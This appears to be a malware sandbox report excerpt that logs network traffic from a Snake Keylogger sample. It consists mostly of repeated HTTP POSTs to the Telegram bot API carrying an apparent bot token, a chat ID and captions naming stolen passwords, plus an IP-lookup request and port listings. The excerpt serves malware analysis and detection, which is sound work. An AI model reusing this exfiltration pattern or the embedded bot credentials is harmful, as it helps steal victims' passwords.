                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a0e113aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a4c0e67Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a87aa22Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ac5a604Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b03a336Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b3f3da5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b7d4400Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571bb8d6a7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571befac4eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c2b47eeHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c6947c9Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ca7423bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ce2db9dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d19b236Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d554d65Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d8c298dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575719153ffdHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571950daa0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757198a1331Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575719c5ae32Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a014885Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a3ce36eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a787e1fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ab1b686Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571aed5200Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b3739f6Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b7072c5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ba9ab98Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571be54603Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c1e7e82Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c5a18ccHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c935407Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ccc8980Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d082464Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d43c05bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d7cf778Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571dd52e6fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571e10c94eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571e4a018cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571e833a3aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ebc7253Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ef80d03Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571f314595Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571f6a7df8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571fa618cfHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571fdf51faHost: api.telegram.orgContent-Length: 504
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
